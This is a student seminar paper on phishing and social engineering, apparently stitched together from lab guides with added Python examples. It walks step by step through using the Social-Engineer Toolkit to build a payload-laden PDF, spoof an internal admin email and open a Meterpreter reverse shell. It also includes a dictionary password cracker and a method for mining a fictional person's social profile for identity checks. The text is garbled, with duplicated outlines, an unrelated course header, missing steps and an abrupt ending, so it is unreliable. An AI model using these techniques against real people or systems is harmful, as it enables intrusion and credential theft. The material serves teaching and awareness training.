Ethics
SEMINAR PAPER:
Attacks on personal data on the Internet,
demonstrated through phishing and
social engineering
STUDENT:
CONTENTS:
1 Introduction
2 Attacks: Concepts and Techniques
3 Types of Malicious Software
3.1 Symptoms of Malware
4 Social Engineering
4.2 Social Engineering Reconnaissance
Introduction
Exam Objectives
Lab Diagram
Connecting to your lab
Exercise 1 - Social Engineering Reconnaissance
Task 1 - Log into MyBook
Step 1
Task 2 - Exploring and Gathering Information
Step 1
Step 2
Step 3
Step 4
Step 5
Summary
5 Implementation
5.1 Generate Phishing Exploit using SET
Scenario
5.1.1 Open Phishing Attachment
5.1.2 Generate Phishing Awareness Email
5.2 Social Engineering - Implementation
Introduction
Learning Outcomes
Exam Objectives
Lab Duration
Help and Support
Lab Topology
5.2.1 Exercise 1 - Social Engineering Types and Techniques
Learning Outcomes
Task 1 - Know the Basic Components of Social Engineering
Elicitation
Interrogation
Pretexting
Task 2 - Know the Motivation Techniques
Task 3 - Know Phishing and Its Types
Reasons for Successful Phishing Attacks
Types of Phishing Attacks
Task 4 - Know Hoax, Baiting, Shoulder Surfing, and Tailgating
Hoax
Shoulder Surfing
Baiting
Tailgating
5.2.2 Exercise 2 - Using the Social-Engineer Toolkit (SET)
Learning Outcomes
Your Devices
Task 1 - Create a Malicious Payload
Step 1
Step 2
Step 3
Step 4
Step 5
Step 6
Step 7
Step 8
Step 9
Step 10
Step 11
Task 2 - Copy the File to the User's System
Step 1
Step 2
Project assignment: Project assignment title
Name and surname, index number
CS450 – Cloud Computing
LIST OF FIGURES:
1 INTRODUCTION
This paper covers the methods Internet security professionals use to analyse what happened after a cyber attack. It explains software and hardware vulnerabilities and the different categories of security flaws that can lead to the compromise of personal data.
It discusses the different kinds of malicious software (known as malware) and the symptoms of a malware infection. It covers the different ways attackers can infiltrate a system, as well as denial-of-service attacks.
Most modern cyber attacks combine several attack techniques. Blended attacks use multiple techniques to infiltrate and attack a system. When an attack cannot be prevented, the job of the cyber security professional is to reduce its impact.
2 ATTACKS: CONCEPTS AND TECHNIQUES
Software vulnerabilities
Software vulnerabilities are usually introduced by errors in the operating system or in application code. Despite all the effort companies put into finding and patching software vulnerabilities, it is common for new ones to surface. Microsoft, Apple and other operating system vendors release patches and updates almost daily. Application updates are also frequent: web browsers, mobile apps and web servers are updated often by the companies or organisations responsible for them.
In 2015 a major compromise of Cisco IOS, named SYNful Knock, was discovered. It allowed attackers to gain control of enterprise-grade routers, such as the legacy Cisco 1841, 2811 and 3825. The attackers could then monitor all network communication and had the ability to infect other network devices. The implant was introduced when a modified IOS image was installed on the routers. To avoid this, always verify the integrity of a downloaded IOS image (check its hash against the value the vendor publishes before installing it) and restrict physical access to the equipment to authorised staff only.
The goal of software updates is to stay current and avoid the exploitation of vulnerabilities. While some companies have penetration testing teams dedicated to searching for, finding and fixing software vulnerabilities before they can be exploited, independent security researchers also specialise in finding vulnerabilities in software.
Google's Project Zero is a good example of this practice. After discovering numerous vulnerabilities in software used by end users, Google formed a permanent team dedicated to finding software vulnerabilities. Google's security research is published on the Project Zero blog.
Hardware vulnerabilities
Hardware vulnerabilities are often introduced by flaws in hardware design. For example, DRAM is essentially an array of capacitors placed very close to each other. It was discovered that, because of this proximity, repeatedly changing the charge of one row of these capacitors can disturb the neighbouring rows. An exploit called Rowhammer was built on this design flaw. By rapidly and repeatedly accessing the same memory rows, Rowhammer induces bit flips in adjacent rows, which lets an attacker modify memory it should not be able to write, including memory belonging to other processes or the kernel, even though that memory is protected by the normal access controls.
Buffer overflow - This vulnerability occurs when data is written beyond the bounds of a buffer. Buffers are memory areas allocated to an application. Writing past the end of a buffer overwrites adjacent memory of the same process, such as other variables, heap metadata or a saved return address (hardware memory protection stops a process from writing directly into another process's memory). This can lead to a crash, data compromise or privilege escalation.
Unvalidated input - Programs often work with input data. The data entering a program can contain malicious content designed to force the program into unintended behaviour. Consider a program that receives an image for processing. A malicious user can craft an image file with invalid image dimensions. The crafted dimensions can force the program to allocate buffers of incorrect and unexpected sizes, for example when the product of width and height overflows the integer used to compute the buffer size, so that a tiny buffer is allocated for a huge image.
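As an added example (not code from the paper), the following Python program parses an untrusted image header in a format constructed for the example and shows both the unchecked size computation, which wraps around on a 32-bit size_t and yields a tiny buffer, and the validated version that rejects the header. The IMG1 header layout, the MAX_PIXELS policy limit and both sample headers are assumptions made here.

```python
"""Added example (not from the paper): sizing a pixel buffer from an
untrusted image header. Format constructed for this example:
    magic "IMG1" | width: uint32 LE | height: uint32 LE | bpp: uint8
"""
import struct

HEADER = struct.Struct("<4sIIB")
MAX_PIXELS = 50_000_000        # assumed policy limit (about 50 megapixels)
UINT32_MASK = 0xFFFFFFFF       # models a 32-bit size_t


def parse_header(blob: bytes) -> dict:
    """Decode the fixed header; rejects truncated input and a wrong magic."""
    if len(blob) < HEADER.size:
        raise ValueError("truncated header")
    magic, width, height, bpp = HEADER.unpack_from(blob)
    if magic != b"IMG1":
        raise ValueError("bad magic")
    return {"width": width, "height": height, "bpp": bpp}


def naive_buffer_size(hdr: dict) -> int:
    """What an unchecked 32-bit computation yields: the product wraps modulo 2**32,
    so a hostile header can make the decoder allocate far too small a buffer and
    then write past its end (the buffer overflow case above)."""
    return (hdr["width"] * hdr["height"] * (hdr["bpp"] // 8)) & UINT32_MASK


def checked_buffer_size(hdr: dict) -> int:
    """Validate each field and bound the product before multiplying."""
    w, h, bpp = hdr["width"], hdr["height"], hdr["bpp"]
    if bpp not in (8, 24, 32):
        raise ValueError(f"unsupported bpp {bpp}")
    if w == 0 or h == 0:
        raise ValueError("zero dimension")
    if w > MAX_PIXELS // h:            # same as w*h > MAX_PIXELS, without overflow
        raise ValueError("image too large")
    return w * h * (bpp // 8)


# Constructed sample headers
BENIGN = HEADER.pack(b"IMG1", 640, 480, 24)
# 0x10000 * 0x10000 * 4 == 2**34, which wraps to 0 in 32 bits
HOSTILE = HEADER.pack(b"IMG1", 0x10000, 0x10000, 32)


def demo() -> dict:
    """Run both computations over the two headers and report what each decides."""
    benign, hostile = parse_header(BENIGN), parse_header(HOSTILE)
    results = {
        "benign_checked": checked_buffer_size(benign),
        "hostile_naive": naive_buffer_size(hostile),
    }
    try:
        checked_buffer_size(hostile)
        results["hostile_checked"] = "accepted"
    except ValueError as exc:
        results["hostile_checked"] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The check `w > MAX_PIXELS // h` is the standard way to bound a product without first computing it; in C the same guard is needed before every `malloc(width * height * bpp)`.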
Race conditions - This vulnerability exists when the outcome of an event depends on ordered or timed results. A race condition becomes a vulnerability when the required ordered or timed events do not occur in the correct order or at the right time, typically in the window between a check (does this file exist? is this user authorised?) and the action that relies on that check.
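Added example of the check-then-act window in Python, not from the paper: the vulnerable function checks whether a path exists and then opens it, and an attacker who has pre-planted a dangling symlink at that path makes the victim create a file of the attacker's choosing; the atomic version lets the kernel do the check and the create in one step. The temporary directory and the file names are constructed for the demo.

```python
"""Added example (not from the paper): a check-then-act race on file creation
and the atomic alternative. Paths are constructed in a temporary directory."""
import os
import tempfile


def create_if_missing_racy(path: str, data: bytes) -> bool:
    """Vulnerable: the existence check and the open are two separate steps.
    A dangling symlink planted at `path` passes the check (exists() is False)
    and open() then follows the link and creates whatever the attacker chose."""
    if os.path.exists(path):
        return False
    with open(path, "wb") as f:
        f.write(data)
    return True


def create_if_missing_atomic(path: str, data: bytes) -> bool:
    """Fixed: O_CREAT|O_EXCL makes check and create one kernel operation and
    fails if anything, a symlink included, already sits at `path`.
    O_NOFOLLOW is added where the platform provides it."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(path, flags, 0o600)
    except OSError:            # EEXIST (or ELOOP): refuse rather than overwrite
        return False
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return True


def run_scenario(create) -> tuple:
    """Attacker pre-plants report.txt -> attacker_chosen.txt (dangling), then the
    victim runs `create`. Returns (victim believes it created the file,
    attacker-chosen file now exists)."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "report.txt")
        attacker_chosen = os.path.join(d, "attacker_chosen.txt")
        os.symlink(attacker_chosen, target)
        created = create(target, b"victim data")
        return created, os.path.exists(attacker_chosen)


if __name__ == "__main__":
    print("racy:  ", run_scenario(create_if_missing_racy))    # (True, True)
    print("atomic:", run_scenario(create_if_missing_atomic))  # (False, False)
```

The same pattern applies to any check that is separated from the action it guards: the fix is to make the operation itself fail safely (exclusive create, compare-and-swap, a lock held across both steps) rather than to make the check faster.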
Weaknesses in security practices - Systems and sensitive data can be protected through techniques such as authentication, authorisation and encryption. Developers should not attempt to create their own security algorithms, because doing so will very likely introduce vulnerabilities. Developers are strongly advised to use security libraries that have already been created, tested and verified.
Access-control problems - Access control is the process of controlling who does what, and ranges from managing physical access to equipment to dictating who has access to a resource, such as a file, and what they can do with it, such as read or modify it. Many security vulnerabilities are caused by improper use of access controls.
Almost all access controls and security practices can be overcome if the attacker has physical access to the target equipment. For example, regardless of the permissions you set on a file, the operating system cannot prevent someone from bypassing the operating system and reading the data directly from the disk. To protect the machine and the data it contains, physical access must be restricted and encryption must be used to protect the data against theft or tampering.
3 TYPES OF MALICIOUS SOFTWARE
Short for malicious software, malware is any code that can be used to steal data, bypass access controls, or cause harm to or compromise a system. Below are some typical types of malware:
Spyware - This malware is designed to track and spy on the user. Spyware often includes activity trackers, keystroke collection and data capture. In an attempt to overcome security measures, spyware often modifies security settings. Spyware is often bundled with legitimate software or with Trojan horses.
Adware - Advertising-supported software is designed to display advertisements automatically. Adware is often installed along with some versions of software. Some adware is designed only to deliver advertisements, but it is also common for adware to come with spyware.
Bot - From the word robot, a bot is malware designed to perform an action automatically, usually online. While most bots are harmless, one increasing use of malicious bots is botnets: several computers are infected with bots that are programmed to quietly wait for commands from the attacker.
Ransomware - This malware is designed to hold a computer system, or the data it contains, captive until a payment is made. Ransomware usually works by encrypting the data on the computer with a key unknown to the user. Some other versions of ransomware exploit specific system vulnerabilities to lock the system. Ransomware is spread through a downloaded file or some software vulnerability.
Scareware - This is a type of malware designed to persuade the user to take a specific action based on fear. Scareware forges pop-up windows that resemble operating system dialog windows. These windows convey falsified messages stating that the system is at risk or needs a specific program to be executed in order to return to normal operation. In reality, no problems were assessed or detected, and if the user agrees and authorises the mentioned program to execute, their system will be infected with malware.
Rootkit - This malware is designed to modify the operating system in order to create a backdoor. Attackers then use the backdoor to access the computer remotely. Most rootkits take advantage of software vulnerabilities to perform privilege escalation and modify system files. It is also common for rootkits to modify the system's forensics and monitoring tools, making them very hard to detect. Often, a computer infected by a rootkit must be wiped and reinstalled.
Virus - A virus is malicious executable code that is attached to other executable files, often legitimate programs. Most viruses require end-user activation and can be activated at a specific time or date. Viruses can be harmless and simply display a picture, or they can be destructive, such as those that modify or delete data. Viruses can also be programmed to mutate in order to avoid detection. Most viruses are now spread by USB drives, optical disks, network shares or email.
Trojan horse - A Trojan horse is malware that carries out malicious operations under the guise of a desired operation. This malicious code exploits the privileges of the user that runs it. Trojans are often found in image files, audio files or games. A Trojan horse differs from a virus in that it binds itself to non-executable files.
Worms - Worms are malicious code that replicates by independently exploiting vulnerabilities in networks. Worms usually slow down networks. Whereas a virus requires a host program to run, worms can run by themselves. Other than the initial infection, they no longer require user participation. After a host is infected, the worm is able to spread very quickly over the network. Worms share similar patterns: they all have an enabling vulnerability, a way to propagate themselves, and they all contain a payload.
Worms are responsible for some of the most devastating attacks on the Internet. As shown in Figure 1, in 2001 the Code Red worm had initially infected 658 servers. Within 19 hours, the worm had infected over 300,000 servers, as shown in Figure 2.
Man-in-the-middle (MitM) - A MitM attack places the attacker between the user and the destination they are communicating with, without the user's knowledge, often by compromising a device on the path. With that level of access, the attacker can intercept and capture user data before it is relayed to its intended destination. MitM attacks are widely used to steal financial information. There is a lot of malware and many techniques that provide attackers with MitM capabilities.
Man-in-the-mobile (MitMo) - A variation of man-in-the-middle, MitMo is a type of attack used to take control over a mobile device. When infected, the mobile device can be instructed to exfiltrate user-sensitive information and send it to the attackers. ZeuS, an example of malware with MitMo capabilities, allows attackers to quietly capture the two-step verification SMS messages sent to users.
3.1 SYMPTOMS OF MALWARE
Regardless of the type of malware a system has been infected with, these are common malware symptoms:
Files are modified.
Files are deleted.
4 SOCIAL ENGINEERING
Social engineering is an access attack that attempts to manipulate individuals into performing actions or divulging confidential information. Social engineers often rely on people's willingness to be helpful, but also prey on their weaknesses. For example, an attacker could call an authorised employee with an urgent problem that requires immediate network access. The attacker could appeal to the employee's vanity, invoke authority through name-dropping, or appeal to the employee's greed.
Pretexting - This is when an attacker calls an individual and lies to them in an attempt to gain access to privileged data. An example involves an attacker who pretends to need personal or financial data in order to confirm the identity of the recipient.
Tailgating - This is when an attacker quickly follows an authorised person into a secure location.
Something for something (quid pro quo) - This is when an attacker requests personal information from a party in exchange for something, such as a free gift.
Wi-Fi password cracking is the process of discovering the password used to protect a wireless network. Here are some techniques used in password cracking:
Social engineering - The attacker manipulates a person who knows the password into providing it.
Brute-force attacks - The attacker tries many possible passwords in an attempt to guess the right one. For example, if the password is a four-digit number, the attacker would have to try at most every one of the 10,000 combinations. Brute-force attacks usually involve a wordlist file (a dictionary attack). This is a text file containing a list of words taken from a dictionary; the program then tries each word and common variations of it (capitalisation, appended digits, years and symbols). Because brute-force attacks take time, complex passwords take much longer to guess. Some password brute-forcing tools include Ophcrack, L0phtCrack, THC Hydra, RainbowCrack and Medusa.
Network sniffing - By listening to and capturing packets sent on the network, an attacker may be able to discover the password if it is sent unencrypted (in plain text). If the password is sent hashed or encrypted, the attacker may still be able to recover it by running a password-cracking tool offline against the captured material; this is how a captured WPA/WPA2 handshake is attacked.
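Added example (Python, not from the paper) of the dictionary attack described above: each wordlist entry is expanded with common mutations (capitalisation, leet substitutions, appended digits and a year) and hashed until the captured hash matches. The wordlist, the mutation rules and the target hash are constructed here; real tools such as those listed above apply far richer rule sets and run many orders of magnitude faster.

```python
"""Added example (not from the paper): an offline dictionary attack with
simple mutation rules. Wordlist, rules and the captured hash are constructed."""
import hashlib

LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})
SUFFIXES = ["", "1", "123", "!", "2015"]   # assumed "common combinations"


def candidates(word: str):
    """Expand one wordlist entry into the variants a user is likely to pick."""
    bases = [word.lower(), word.capitalize(), word.upper(), word.lower().translate(LEET)]
    seen = set()
    for base in bases:
        for suffix in SUFFIXES:
            cand = base + suffix
            if cand not in seen:
                seen.add(cand)
                yield cand


def crack(target_hex: str, wordlist, algo: str = "sha256"):
    """Return (password, attempts); password is None if the list is exhausted."""
    attempts = 0
    for word in wordlist:
        for cand in candidates(word):
            attempts += 1
            if hashlib.new(algo, cand.encode()).hexdigest() == target_hex:
                return cand, attempts
    return None, attempts


def keyspace(charset_size: int, length: int) -> int:
    """Guesses a pure brute force needs in the worst case when no dictionary applies."""
    return charset_size ** length


# Constructed wordlist: "mops" is the kind of pet name the reconnaissance
# exercise later in this paper harvests from a profile page.
WORDLIST = ["password", "welcome", "summer", "mops", "dragon"]
# Constructed "captured" hash, standing in for what a sniffer or a leaked
# database would hand the attacker.
CAPTURED = hashlib.sha256(b"Summer2015").hexdigest()


if __name__ == "__main__":
    print(crack(CAPTURED, WORDLIST))
    print("4-digit PIN keyspace:", keyspace(10, 4))
    print("8-char mixed-case alphanumeric keyspace:", keyspace(62, 8))
```

Unsalted fast hashes such as SHA-256 make this attack cheap; a slow, salted password hash (bcrypt, scrypt, Argon2) is what turns "minutes" into "years" for the same wordlist.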
4.2 Social Engineering Reconnaissance
Introduction
Exercise 1 - Social Engineering Reconnaissance
Conclusion
Introduction
Duration: this exercise will take approximately 20 minutes.
Objectives
Social engineering
Diagram
The figure below shows the network topology required to carry out this exercise.
The following is the list of devices that will be used, their roles and the associated software:
A compromise of a company often begins with attackers searching social networks for personal details that could help them obtain legitimate credentials or impersonate that person at work. Usually the goal is to gain access to an initial system that the person owns or has access to; from there the attacker will try to escalate and move through the building or the network, gaining access to more interesting areas. In this exercise the following tasks will be carried out:
Log into MyBook
Exploring and gathering information
We will briefly explore some of the personal details they could use, and the typical details that should always be kept private, by reviewing the website.
Logging into MyBook.
Step 1
http://mybook
Figure 1.2 Screenshot of the PLABWIN10 machine: MyBook Philip Nomad Timeline page
We are currently looking at the Timeline page, where recent activity related to the user's life is posted publicly and anyone can see it.
Information gathering is a key part of any attack; we will review the kinds of details an attacker could use to gain the trust of others by impersonating Phillip in some way.
Step 1
Exploring this web page a little further, we can see that Phillip is quite popular, with 1325 followers, and that he is a Front End Software Engineer. This makes Phillip an interesting target, given that he very likely has personal details that could be used to fool the company into thinking the attacker is Phillip.
Step 2
He is an active member of this site, with a post from only 5 minutes ago in which he commented on someone else's photo and shares a personal album with a friend.
We can see that Phillip is married. Note the style of clothing on the wedding day; the wedding location in the background could be key if work colleagues were also invited to the wedding.
There are two friends, John and Alexis, who are close enough to Phillip to comment on his pictures, and we learn that Phillip may become, or already is, the father of a baby.
Scroll down.
Interestingly, Phillip's car has broken down. This could be very useful information if an attacker started investigating Phillip's personal life and contacted the garage to ask about the vehicle Phillip drives.
Step 3
Figure 1.6 Screenshot of PLABWIN10: MyBook Philip Nomad page with biographical details
Phillip has left details such as his phone number, date of birth and where he went to school. These are key pieces of information attackers use to gain the trust of staff who may be performing security checks. One of the most commonly used questions is "what is your date of birth?". We now have a legitimate answer to give. If Phillip were real, we could also start searching for personal details at Oxford University and see whether we get any hits for him attending the university; all of this is information that helps the reconnaissance process.
Figure 1.7 Screenshot of PLABWIN10: MyBook Philip Nomad page with biographical details
Here we are presented with his previous work experience at HP, and before that we can see Costa. Again, we could search HP's site to see what it reveals about Phillip; this could lead the attacker to more useful information to convince the IT department that Phillip needs his password changed and that they can do it on his behalf. Another piece of the puzzle is his likely home location in Kingston upon Thames; mobile software today often tags pictures or posts with the user's location at the time of posting.
Step 4
Here, notice that Phillip's position at work has progressed: he is listed as a Creative Director working at Front End Software Design. A director role implies some very important things: Phillip has access to important resources and information, and his passwords probably give him administrator-level or root access to domains or servers full of data that could be very lucrative in situations such as corporate espionage. This is a shared album, and we can see that he enjoys raves and colourful views and may have a small pug; again, a classic security question is "what is/was the name of your first pet / dog / cat?". In addition, many people use their pets' names as passwords, and their date of birth for passwords or account PINs.
Step 5
We can see a post by Nina Nomad, who could be a family connection, and Linda, who is also a software engineer and might work with Phillip; in addition we see James, who is the CEO of a company called IT Farm and could have a working relationship that would be useful for finding out more about the kind of work done and what access Phillip had to IT Farm.
The next phase the attacker needs is "friending", usually by setting up a fake account with details that could trick Phillip into accepting it, such as pretending to work at IT Farm and using that as the justification for Phillip to accept the "friend" request.
The purpose, of course, is to gather information leading to a possible phishing email attack against the CEO of IT Farm, James Carter, or to socially engineer Google's IT/HR department into changing Phillip's password, which gives them access.
Conclusion
The Social Engineering Reconnaissance part of the assignment is complete.
5 PHISHING
Phishing is when a malicious party sends a fraudulent email disguised as coming from a legitimate, trusted source. The intent of the message is to trick the recipient into installing malware on their device or into sharing personal or financial information. An example of phishing is an email forged to look as if it was sent by a retail store, asking the user to click a link to claim a prize. The link may lead to a fake site asking for personal information, or it may install a virus.
Spear phishing is a highly targeted phishing attack. While phishing and spear phishing both use email to reach their victims, spear phishing emails are customised for a specific person. Before sending the email, the attacker researches the target's interests. For example, the attacker learns that the target is interested in cars and has been trying to buy a specific model. The attacker joins the same car discussion forum where the target is a member, forges a car sale offer and sends an email to the target. The email contains a link to pictures of the car. When the target clicks the link, malware is installed on the target's computer.
6 IMPLEMENTATION
Proposed solution for improving the selected business system
Description
CYBRScore's Phishing lab is a premium Cybrary Lab Intended for Intermediate level students and
learners. CYBRScore's Phishing Lab teaches students how to conduct a Phishing simulation and
assessment with the objective of generating awareness among users in order to let Vulnerability
Assessment Analysts be able to visualize those areas and users that could be more vulnerable to a
Social Engineering attack.
CYBRScore's Phishing Lab is targeted toward Vulnerability Assessment Analysts as well as future
cybersecurity workers. Upon successful completion of CYBRScore's Phishing Lab, the student will be
able to Create a Phishing exploit, observe how outside access and compromise is possible, be able to
generate a Phishing awareness e-mail campaign. CYBRScore's Phishing Lab takes approximately 1
hour and 30 minutes to complete.
In CYBRScore's Phishing Lab, students will be able to generate a Phishing exploit using SET (the
Social-Engineer Toolkit) to conduct a simulated Phishing attack. Phishing is a key element in any
cybersecurity awareness program and an integral part of a Vulnerability Assessment Analyst's tool set.
In CYBRScore's Phishing Lab, Students will be able to open the content of an email with a phishing
attachment, download it and thus be able to observe the features and interactions with an open email
session. Learning this process is key for all Vulnerability Assessment Analysts.
CYBRScore's Phishing Lab also offers students the possibility to learn how to create an awareness
campaign, and to review and tailor the content of the email that will be sent so that it is more effective
among target users once the campaign has been launched.
CYBRScore's Phishing Lab is part of the Vulnerability Assessment Analyst career path. Completion of
CYBRScore's Phishing Lab means that the student has learned and demonstrated the ability to craft a
Phishing exploit, interact with the exploit, and create a Phishing awareness e-mail. Click on the lab to
start learning a key cybersecurity skill.
The first part of this chapter covers: creating a phishing email, demonstrating how phishing emails can allow access from outside, and generating a phishing awareness email.
In the hypothetical business system it was observed that employees open every message in their inbox. The employees' email therefore needs to be monitored. It was decided to start a campaign in which employees within the organisation receive phishing emails from their colleagues in the IT department, which will familiarise the employees with the dangers of clicking on unknown links.
Scenario
Per NIST SP 800-83:
Phishing refers to use of deceptive computer-based means to trick individuals into disclosing sensitive
personal information. To perform a phishing attack, an attacker creates a Web site or e-mail that looks
as if it is from a well-known organization, such as an online business, credit card company, or financial
institution. The fraudulent e-mails and Web sites are intended to deceive users into disclosing personal
data, usually financial information. For example, phishers might seek usernames and passwords for
online banking sites, as well as bank account numbers.
In this section, we will show how easy it is for an attacker to generate a targeted phishing email using
Kali.
1. Log into the Kali machine using the username root and the password P@ssw0rd
2. Open the Kali Terminal by clicking the terminal icon on the left side of your desktop.
3. Open SET by typing setoolkit and pressing Enter. Press Y to accept the terms of service.
4. Select Option 1 from the menu (Social-Engineering Attacks) by typing the following into
the terminal: 1
5. Select option 1 for Spear-Phishing, then select option 1 to perform a Mass Email Attack
by typing into the terminal 1 for each occurrence.
6. Select Payload 13, which is Adobe PDF Embedded EXE Social Engineering, then select
option 2 to use a built-in Blank PDF for the attack.
8. When prompted for an IP address for your LHOST, enter the IP address of the Kali box,
which is 192.168.1.10. Press Enter to keep the port to connect back to at 443. It will take a few
moments to generate the payload for the exploit.
9. Let's change the filename of the pdf to something different. For now, let's call it
pcfix.zip.pdf
10. Select option 1 to e-mail attack a single email address, then select option 1 again for a
pre-defined template.
11. Select option 4, which will use the Strange internet usage email template. When prompted,
send the email to tsmith@organization.com
12.
13. Next, select option 2 to use your own server or open relay. We're going to spoof an email
from within the company. Enter admin@organization.com as the "From" address. Enter
admin as the FROM NAME that the user will see.
A properly secured email gateway would typically not allow SMTP relay, but open
relays do still occur in the real world.
14. Enter 192.168.1.76 as the SMTP address we'll be attacking. Press Enter to leave the default
SMTP port (25), then type yes to flag the message as high priority.
15. Enter no when it asks if the server supports TLS, then type yes to set up a listener on port
443 to detect if a user clicks the attachment.
1. Using the Resources tab in the right panel of the lab window, switch over to the Windows
10 virtual machine.
2. Log in to your Windows 10 machine using the username Admin and the password
password. We're going to simulate a user clicking the .pdf link that you sent out in the previous
steps.
It has already been configured to receive mail for the tsmith@organization.com account.
4. Click on the email in your inbox from the admin. Click Save at the bottom of the screen.
Read the content of the email. It appears to come from an admin account on the
organization.com domain. It then asks a user to help in fixing a virus outbreak.
6. When prompted in Adobe Acrobat, accept the license terms. It will ask you to save in order
to extract its contents. Navigate to the Desktop and click the Save button. At the Launch File
prompt, click the Open button.
You may get a message that the command processor has stopped working - this is fine
and your remote session should have still opened on the Kali machine.
7. Switch to your Kali machine. You should see that a Meterpreter session has been opened.
Press Enter to return to a prompt, then type sessions -i 1. This will allow you to interact with
your active meterpreter session. From here an attacker can escalate privileges or install warez.
This section ends with the user being able to interact with a meterpreter shell. This lab is meant to show
you how an attack can leverage a phishing attempt to get a reverse shell. Attackers can use Veil and
other payload obfuscation methods to bypass commercial antivirus.
At many companies, HR and recruiting are prime targets, as it is their job to open attachments from
untrusted sources. These individuals should open untrusted documents in a virtual sandbox when
possible. Adobe specifically has been targeted by a number of 0-day vulnerabilities. When possible,
look to use an alternative PDF viewer (e.g. Foxit, Nitro PDF).
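As an added example (not part of the CYBRScore lab or of SET), the check below shows what a mail gateway or an analyst script can flag on a message like the one built above: an internal From address submitted by a host that is not the organization's own relay, the high-priority flag, urgency wording, the double-extension attachment name, and a PDF carrying a Launch action. The domain organization.com, the addresses and the file name come from the lab; the trusted-relay list and the sample messages themselves are constructed assumptions.

```python
import re
from email import message_from_string, policy
from email.message import EmailMessage
from email.utils import parseaddr
from typing import List, Optional

INTERNAL_DOMAIN = "organization.com"       # victim domain used in the lab
TRUSTED_SUBMITTERS = {"192.168.1.76"}      # assumption: hosts allowed to submit mail as that domain
RISKY_INNER_EXT = {"zip", "exe", "scr", "js", "vbs", "bat", "cmd"}
LURE_WORDS = ("virus", "outbreak", "immediately", "fix")


def build_sample_message(malicious: bool = True) -> str:
    """Constructed sample, not a real capture. The malicious variant mirrors the lab
    mail: spoofed internal From, high priority, and pcfix.zip.pdf with a /Launch action."""
    msg = EmailMessage()
    if malicious:
        msg["Received"] = "from kali (192.168.1.10) by 192.168.1.76 with SMTP"
        msg["X-Priority"] = "1 (Highest)"
        body = "We detected a virus outbreak. Open the attached fix immediately."
        pdf = b"%PDF-1.4\n1 0 obj << /Type /Action /S /Launch >> endobj\n"
        name = "pcfix.zip.pdf"
    else:
        msg["Received"] = "from webmail (192.168.1.76) by 192.168.1.76 with SMTP"
        body = "Please review the updated holiday calendar."
        pdf = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n"
        name = "calendar.pdf"
    msg["From"] = "admin <admin@organization.com>"
    msg["To"] = "tsmith@organization.com"
    msg["Subject"] = "Strange internet usage from your computer" if malicious else "Holiday calendar"
    msg.set_content(body)
    msg.add_attachment(pdf, maintype="application", subtype="pdf", filename=name)
    return msg.as_string()


def submitting_host(msg: EmailMessage) -> Optional[str]:
    """IP of the host that handed the mail to the first relay: the earliest
    Received header is the last one in header order."""
    received = msg.get_all("Received") or []
    if not received:
        return None
    m = re.search(r"(\d{1,3}(?:\.\d{1,3}){3})", str(received[-1]))
    return m.group(1) if m else None


def phishing_indicators(raw: str) -> List[str]:
    """Return a list of indicator tags found in the raw RFC 5322 message."""
    msg = message_from_string(raw, policy=policy.default)
    findings: List[str] = []

    # 1. A From address in our own domain must come from one of our own relays;
    #    anything else is the "spoof an email from within the company" case.
    sender = parseaddr(str(msg.get("From", "")))[1].lower()
    hop = submitting_host(msg)
    if sender.endswith("@" + INTERNAL_DOMAIN) and hop not in TRUSTED_SUBMITTERS:
        findings.append(f"spoofed_internal_sender:{hop}")

    # 2. The message is flagged as high priority to push the reader to act.
    if str(msg.get("X-Priority", "")).strip().startswith("1"):
        findings.append("high_priority")

    # 3. Urgency wording in the body (two or more lure words).
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content().lower() if body else ""
    if sum(word in text for word in LURE_WORDS) >= 2:
        findings.append("urgency_lure")

    # 4. Attachment checks: a double extension hiding an archive/executable,
    #    and a PDF Launch action, which can start an external program.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        pieces = name.split(".")
        if len(pieces) >= 3 and pieces[-2] in RISKY_INNER_EXT:
            findings.append(f"double_extension:{name}")
        data = part.get_payload(decode=True) or b""
        if part.get_content_type() == "application/pdf" and b"/Launch" in data:
            findings.append(f"pdf_launch_action:{name}")
    return findings
```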
2. Open the Security Reminder doc, located in your Documents folder. Read over the
document. This is an example Security Awareness document that may be disseminated to
company employees.
4. Now that we have a better understanding of how phishing works and have seen an
example security awareness document, we need to draft an email that addresses phishing threats
to our employees. To save time, there is a template already created in the Documents folder.
Open Phishing Reminder from the Documents folder and read the contents of the message in
Open Office.
5. Copy the contents of Phishing Reminder.docx. Move back to Thunderbird and select
Write a new message (in the center of the Thunderbird window).
Notice we didn't attach the document to the email. Additionally, plain text email (non
HTML) is a best security practice.
6. In the To: address, enter all@organization.com. The Subject line should read Phishing
Alert. Paste the contents of Phishing Reminder.docx in the body of the email. Press the Send
button when complete.
As part of awareness activities, organizations should educate their users on the techniques that
criminals use to trick users into disclosing information. Organizations should also provide users with
recommendations for avoiding phishing attacks, which are described in Section 2.8.1. Examples of
such recommendations are as follows:
Never reply to e-mail requests for financial or personal information. Organizations should not
ask for such information by e-mail, because e-mail is susceptible to monitoring by unauthorized
parties. Instead, call the organization at its legitimate phone number, or type the organization's
known Web site address into a Web browser. Do not use the contact information provided in the
e-mail.
Do not provide passwords, PINs, or other access codes in response to e-mails or unsolicited
popup windows. Only enter such information into the organization's legitimate Web site.
Do not open suspicious e-mail file attachments, even if they come from known senders. If an
unexpected attachment is received, contact the sender (preferably by a method other than e-mail,
such as a phone) to confirm that the attachment is legitimate.
Do not respond to any suspicious or unwanted e-mails. (Asking to have an e-mail address
removed from a malicious party's mailing list confirms the existence and active use of that e-mail
address, potentially leading to additional attack attempts.)
Introduction
Lab Topology
Exercise 1- Social Engineering Types and Techniques
Exercise 2 - Using the Social-Engineer Toolkit (SET)
Exercise 3 - Preventing Social Engineering Exploitation
Review
Introduction
Ethical Hacking
Social Engineering
Social Engineering Toolkit (SET)
Reverse Handler
Payload
PhishTank
Netcraft Toolbar
Welcome to the Social Engineering Practice Lab. In this module, you will be provided with the
instructions and devices needed to develop your hands-on skills.
Learning Outcomes
In this module, you will complete the following exercises:
Note: Our main focus is to cover the practical, hands-on aspects of the exam objectives. We
